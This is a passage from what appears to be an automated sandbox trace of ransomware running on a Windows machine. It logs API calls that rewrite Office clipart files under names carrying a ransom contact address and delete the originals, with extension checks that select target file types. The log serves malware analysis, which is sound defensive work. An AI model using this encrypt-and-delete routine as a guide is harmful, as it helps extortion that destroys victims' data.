nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.447] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.447] SetEndOfFile (hFile=0x2c8) returned 1 [0065.447] CloseHandle (hObject=0x2c8) returned 1 [0065.448] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.448] SetEndOfFile (hFile=0x368) returned 1 [0065.449] CloseHandle (hObject=0x368) returned 1 [0065.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.450] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf")) returned 1 [0065.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 68 [0065.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 68 [0065.450] lstrlenW (lpString=".doc") returned 4 [0065.450] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.450] lstrlenW (lpString=".docx") returned 5 [0065.450] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.450] lstrlenW (lpString=".pdf") returned 4 [0065.450] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.450] lstrlenW (lpString=".xls") returned 4 [0065.450] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.450] lstrlenW (lpString=".xlsx") returned 5 [0065.450] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.451] lstrlenW (lpString=".ppt") returned 4 [0065.451] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 68 [0065.451] lstrlenW (lpString=".zip") returned 4 [0065.451] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.451] lstrlenW (lpString=".rar") returned 4 [0065.451] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.451] lstrlenW (lpString=".bz2") returned 4 [0065.451] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.451] lstrlenW (lpString=".7z") returned 3 [0065.451] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 68 [0065.451] lstrlenW (lpString=".dbf") returned 4 [0065.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 68 [0065.451] lstrlenW (lpString=".1cd") returned 4 [0065.451] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 68 [0065.451] lstrlenW (lpString=".jpg") returned 4 [0065.451] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.451] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.452] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.452] GetLastError () returned 0x0 [0065.452] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xa8c, lpOverlapped=0x0) returned 1 [0065.471] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xa90, lpOverlapped=0x0) returned 1 [0065.472] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.472] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.472] SetEndOfFile (hFile=0x2c8) returned 1 [0065.473] CloseHandle (hObject=0x2c8) returned 1 [0065.474] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.474] SetEndOfFile (hFile=0x368) returned 1 [0065.474] CloseHandle (hObject=0x368) returned 1 [0065.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.475] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf")) returned 1 [0065.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 68 [0065.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 68 [0065.475] lstrlenW (lpString=".doc") returned 4 [0065.476] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.476] lstrlenW (lpString=".docx") returned 5 [0065.476] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.476] lstrlenW (lpString=".pdf") returned 4 [0065.476] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.476] lstrlenW (lpString=".xls") returned 4 [0065.476] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.476] lstrlenW (lpString=".xlsx") returned 5 [0065.476] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.476] lstrlenW (lpString=".ppt") returned 4 [0065.476] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 68 [0065.476] lstrlenW (lpString=".zip") returned 4 [0065.476] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.476] lstrlenW (lpString=".rar") returned 4 [0065.476] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.476] lstrlenW (lpString=".bz2") returned 4 [0065.476] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.476] lstrlenW (lpString=".7z") returned 3 [0065.476] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 68 [0065.476] lstrlenW (lpString=".dbf") returned 4 [0065.476] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 68 [0065.476] lstrlenW (lpString=".1cd") returned 4 [0065.477] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 68 [0065.477] lstrlenW (lpString=".jpg") returned 4 [0065.477] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.477] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.477] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.477] GetLastError () returned 0x0 [0065.477] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1b1a, lpOverlapped=0x0) returned 1 [0065.756] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1b20, lpOverlapped=0x0) returned 1 [0065.757] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.758] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.758] SetEndOfFile (hFile=0x2c8) returned 1 [0065.758] CloseHandle (hObject=0x2c8) returned 1 [0065.759] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.759] SetEndOfFile (hFile=0x368) returned 1 [0065.761] CloseHandle (hObject=0x368) returned 1 [0065.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.762] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf")) returned 1 [0065.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 68 [0065.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 68 [0065.763] lstrlenW (lpString=".doc") returned 4 [0065.763] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.763] lstrlenW (lpString=".docx") returned 5 [0065.763] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.763] lstrlenW (lpString=".pdf") returned 4 [0065.763] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.763] lstrlenW (lpString=".xls") returned 4 [0065.763] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.763] lstrlenW (lpString=".xlsx") returned 5 [0065.763] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.763] lstrlenW (lpString=".ppt") returned 4 [0065.763] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 68 [0065.763] lstrlenW (lpString=".zip") returned 4 [0065.763] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.763] lstrlenW (lpString=".rar") returned 4 [0065.763] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.763] lstrlenW (lpString=".bz2") returned 4 [0065.763] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.763] lstrlenW (lpString=".7z") returned 3 [0065.763] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 68 [0065.763] lstrlenW (lpString=".dbf") returned 4 [0065.764] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 68 [0065.764] lstrlenW (lpString=".1cd") returned 4 [0065.764] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 68 [0065.764] lstrlenW (lpString=".jpg") returned 4 [0065.764] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.764] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.764] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.765] GetLastError () returned 0x0 [0065.765] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x4712, lpOverlapped=0x0) returned 1 [0065.787] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x4720, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x4720, lpOverlapped=0x0) returned 1 [0065.788] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.788] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.788] SetEndOfFile (hFile=0x2c8) returned 1 [0065.788] CloseHandle (hObject=0x2c8) returned 1 [0065.789] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.790] SetEndOfFile (hFile=0x368) returned 1 [0065.791] CloseHandle (hObject=0x368) returned 1 [0065.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf")) returned 1 [0065.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 68 [0065.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 68 [0065.792] lstrlenW (lpString=".doc") returned 4 [0065.792] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.792] lstrlenW (lpString=".docx") returned 5 [0065.792] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.792] lstrlenW (lpString=".pdf") returned 4 [0065.792] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.792] lstrlenW (lpString=".xls") returned 4 [0065.792] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.792] lstrlenW (lpString=".xlsx") returned 5 [0065.792] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.792] lstrlenW (lpString=".ppt") returned 4 [0065.792] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 68 [0065.792] lstrlenW (lpString=".zip") returned 4 [0065.792] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.792] lstrlenW (lpString=".rar") returned 4 [0065.792] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.792] lstrlenW (lpString=".bz2") returned 4 [0065.792] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.792] lstrlenW (lpString=".7z") returned 3 [0065.792] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 68 [0065.792] lstrlenW (lpString=".dbf") returned 4 [0065.792] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 68 [0065.792] lstrlenW (lpString=".1cd") returned 4 [0065.792] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 68 [0065.793] lstrlenW (lpString=".jpg") returned 4 [0065.793] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.793] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.793] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.793] GetLastError () returned 0x0 [0065.793] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xfea, lpOverlapped=0x0) returned 1 [0065.887] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xff0, lpOverlapped=0x0) returned 1 [0065.887] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.888] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.888] SetEndOfFile (hFile=0x2c8) returned 1 [0065.888] CloseHandle (hObject=0x2c8) returned 1 [0065.889] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.889] SetEndOfFile (hFile=0x368) returned 1 [0065.890] CloseHandle (hObject=0x368) returned 1 [0065.890] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.890] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf")) returned 1 [0065.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 68 [0065.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 68 [0065.891] lstrlenW (lpString=".doc") returned 4 [0065.891] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.891] lstrlenW (lpString=".docx") returned 5 [0065.891] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.891] lstrlenW (lpString=".pdf") returned 4 [0065.891] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.891] lstrlenW (lpString=".xls") returned 4 [0065.891] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.891] lstrlenW (lpString=".xlsx") returned 5 [0065.891] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.891] lstrlenW (lpString=".ppt") returned 4 [0065.891] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 68 [0065.891] lstrlenW (lpString=".zip") returned 4 [0065.891] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.891] lstrlenW (lpString=".rar") returned 4 [0065.891] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.891] lstrlenW (lpString=".bz2") returned 4 [0065.891] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.891] lstrlenW (lpString=".7z") returned 3 [0065.891] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 68 [0065.891] lstrlenW (lpString=".dbf") returned 4 [0065.891] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 68 [0065.892] lstrlenW (lpString=".1cd") returned 4 [0065.892] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 68 [0065.892] lstrlenW (lpString=".jpg") returned 4 [0065.892] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.892] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.892] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.892] GetLastError () returned 0x0 [0065.893] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2168, lpOverlapped=0x0) returned 1 [0065.963] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2170, lpOverlapped=0x0) returned 1 [0065.964] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.965] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.965] SetEndOfFile (hFile=0x2c8) returned 1 [0065.965] CloseHandle (hObject=0x2c8) returned 1 [0065.967] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.967] SetEndOfFile (hFile=0x368) returned 1 [0065.968] CloseHandle (hObject=0x368) returned 1 [0065.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.968] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf")) returned 1 [0065.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 68 [0065.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 68 [0065.969] lstrlenW (lpString=".doc") returned 4 [0065.969] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.969] lstrlenW (lpString=".docx") returned 5 [0065.969] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.969] lstrlenW (lpString=".pdf") returned 4 [0065.969] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.969] 